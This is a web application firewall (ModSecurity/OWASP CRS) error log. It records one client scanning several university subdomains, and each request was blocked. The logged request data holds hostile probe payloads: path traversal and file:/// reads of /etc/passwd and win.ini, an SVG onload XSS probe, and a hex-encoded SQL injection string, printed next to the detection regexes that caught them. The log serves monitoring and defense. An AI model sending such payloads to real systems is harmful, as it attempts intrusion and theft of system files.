[Tue Aug 29 11:36:33.530474 2023] [:error] [pid 1407] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:controller: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO110cCo-f0AAAV-t@oAAAAF"]
[Tue Aug 29 11:36:33.572046 2023] [:error] [pid 1405] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:keyword. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: % found within ARGS:keyword: %61%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%27%27%2b%28%53%45%4c%45%43%54%20%6d%64%35%28%39%39%39%39%39%39%39%29%29%2b%27"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/mobile/plugin/browser.jsp"] [unique_id "ZO110cCo-f0AAAV9bz0AAAAA"]
[Tue Aug 29 11:36:33.580790 2023] [:error] [pid 1448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:controller: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO110cCo-f0AAAWoV1oAAAAV"]
[Tue Aug 29 11:36:33.581292 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO110cCo-f0AAAUbg8AAAABQ"]
[Tue Aug 29 11:36:33.591941 2023] [:error] [pid 1405] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:controller: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO110cCo-f0AAAV9bz4AAAAA"]
[Tue Aug 29 11:36:33.593171 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:controller: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO110cCo-f0AAASEJfEAAAAE"]
[Tue Aug 29 11:36:34.352586 2023] [:error] [pid 1457] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:page: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/pandora_console/ajax.php"] [unique_id "ZO110sCo-f0AAAWx8x4AAAAg"]
[Tue Aug 29 11:36:34.355686 2023] [:error] [pid 1405] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:page: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/pandora_console/ajax.php"] [unique_id "ZO110sCo-f0AAAV9bz8AAAAA"]
[Tue Aug 29 11:36:34.360084 2023] [:error] [pid 1436] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:ID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:ID: <svg onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO110sCo-f0AAAWcCRsAAAAL"]
[Tue Aug 29 11:36:34.361254 2023] [:error] [pid 1448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:page: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/pandora_console/ajax.php"] [unique_id "ZO110sCo-f0AAAWoV1wAAAAV"]
[Tue Aug 29 11:36:34.364868 2023] [:error] [pid 1450] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:ID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onload= found within ARGS:ID: <svg onload=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO110sCo-f0AAAWqupMAAAAX"]
[Tue Aug 29 11:36:34.364946 2023] [:error] [pid 1451] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:page: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/pandora_console/ajax.php"] [unique_id "ZO110sCo-f0AAAWrxpMAAAAY"]
[Tue Aug 29 11:36:34.367202 2023] [:error] [pid 1185] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:controller: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO110sCo-f0AAAShCc4AAAAi"]
[Tue Aug 29 11:36:34.367379 2023] [:error] [pid 1423] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:page: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/pandora_console/ajax.php"] [unique_id "ZO110sCo-f0AAAWPpYQAAAAH"]
[Tue Aug 29 11:36:34.369217 2023] [:error] [pid 1407] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:ID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:ID: <svg onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO110sCo-f0AAAV-t@wAAAAF"]
[Tue Aug 29 11:36:34.376098 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:ID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onload= found within ARGS:ID: <svg onload=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO110sCo-f0AAASEJfMAAAAE"]
[Tue Aug 29 11:36:34.418722 2023] [:error] [pid 1278] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:ID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onload= found within ARGS:ID: <svg onload=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO110sCo-f0AAAT@KzQAAAA2"]
[Tue Aug 29 11:36:36.858658 2023] [:error] [pid 1405] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:ID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onload= found within ARGS:ID: <svg onload=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO111MCo-f0AAAV9b0YAAAAA"]
[Tue Aug 29 11:36:36.919134 2023] [:error] [pid 1457] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ACS_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:ACS_path: ../../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/advanced_component_system/index.php"] [unique_id "ZO111MCo-f0AAAWx8ygAAAAg"]
[Tue Aug 29 11:36:36.938925 2023] [:error] [pid 1232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ACS_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:ACS_path: ../../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/advanced_component_system/index.php"] [unique_id "ZO111MCo-f0AAATQXoQAAAAO"]
[Tue Aug 29 11:36:36.952376 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ACS_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:ACS_path: ../../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/advanced_component_system/index.php"] [unique_id "ZO111MCo-f0AAAUbg80AAABQ"]
[Tue Aug 29 11:36:36.978010 2023] [:error] [pid 1451] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ACS_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:ACS_path: ../../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/advanced_component_system/index.php"] [unique_id "ZO111MCo-f0AAAWrxqMAAAAY"]
[Tue Aug 29 11:36:36.979641 2023] [:error] [pid 1232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ACS_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:ACS_path: ../../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/advanced_component_system/index.php"] [unique_id "ZO111MCo-f0AAATQXoYAAAAO"]
[Tue Aug 29 11:36:37.362283 2023] [:error] [pid 1457] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ACS_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:ACS_path: ../../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/advanced_component_system/index.php"] [unique_id "ZO111cCo-f0AAAWx8ysAAAAg"]
[Tue Aug 29 11:36:37.366565 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:urlPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:urlPath: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/getCorsFile"] [unique_id "ZO111cCo-f0AAASEJgAAAAAE"]
[Tue Aug 29 11:36:37.383390 2023] [:error] [pid 1457] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:urlPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:urlPath: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/getCorsFile"] [unique_id "ZO111cCo-f0AAAWx8ywAAAAg"]
[Tue Aug 29 11:36:37.387229 2023] [:error] [pid 1451] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:urlPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:urlPath: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/getCorsFile"] [unique_id "ZO111cCo-f0AAAWrxqUAAAAY"]
[Tue Aug 29 11:36:37.392733 2023] [:error] [pid 1278] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:urlPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:urlPath: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/getCorsFile"] [unique_id "ZO111cCo-f0AAAT@Kz8AAAA2"]
[Tue Aug 29 11:36:37.400165 2023] [:error] [pid 1185] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:urlPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:urlPath: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/getCorsFile"] [unique_id "ZO111cCo-f0AAAShCdEAAAAi"]
[Tue Aug 29 11:36:37.417661 2023] [:error] [pid 1457] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:urlPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:urlPath: file:///c://windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/getCorsFile"] [unique_id "ZO111cCo-f0AAAWx8y0AAAAg"]
[Tue Aug 29 11:36:37.426747 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:urlPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:urlPath: file:///c://windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/getCorsFile"] [unique_id "ZO111cCo-f0AAASEJgIAAAAE"]
[Tue Aug 29 11:36:37.427798 2023] [:error] [pid 1447] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:urlPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:urlPath: file:///c://windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/getCorsFile"] [unique_id "ZO111cCo-f0AAAWnjhIAAAAT"]
[Tue Aug 29 11:36:37.432231 2023] [:error] [pid 1450] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:urlPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:urlPath: file:///c://windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/getCorsFile"] [unique_id "ZO111cCo-f0AAAWqupwAAAAX"]
[Tue Aug 29 11:36:37.441382 2023] [:error] [pid 1232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:urlPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:urlPath: file:///c://windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/getCorsFile"] [unique_id "ZO111cCo-f0AAATQXooAAAAO"]
[Tue Aug 29 11:36:37.464322 2023] [:error] [pid 1438] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:urlPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:urlPath: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/getCorsFile"] [unique_id "ZO111cCo-f0AAAWexkAAAAAP"]
[Tue Aug 29 11:36:38.380623 2023] [:error] [pid 1278] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:href. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:href: ../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/_s_/dyn/Log_highlight"] [unique_id "ZO111sCo-f0AAAT@K0MAAAA2"]
[Tue Aug 29 11:36:38.380764 2023] [:error] [pid 1409] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:urlPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:urlPath: file:///c://windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/getCorsFile"] [unique_id "ZO111sCo-f0AAAWBBQwAAAAB"]
[Tue Aug 29 11:36:38.381355 2023] [:error] [pid 1277] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:href. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:href: ../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/_s_/dyn/Log_highlight"] [unique_id "ZO111sCo-f0AAAT9PUAAAAA1"]
[Tue Aug 29 11:36:38.387123 2023] [:error] [pid 1456] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:href. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:href: ../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/_s_/dyn/Log_highlight"] [unique_id "ZO111sCo-f0AAAWwdPQAAAAe"]
[Tue Aug 29 11:36:38.397711 2023] [:error] [pid 1423] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:href. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:href: ../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/_s_/dyn/Log_highlight"] [unique_id "ZO111sCo-f0AAAWPpYgAAAAH"]
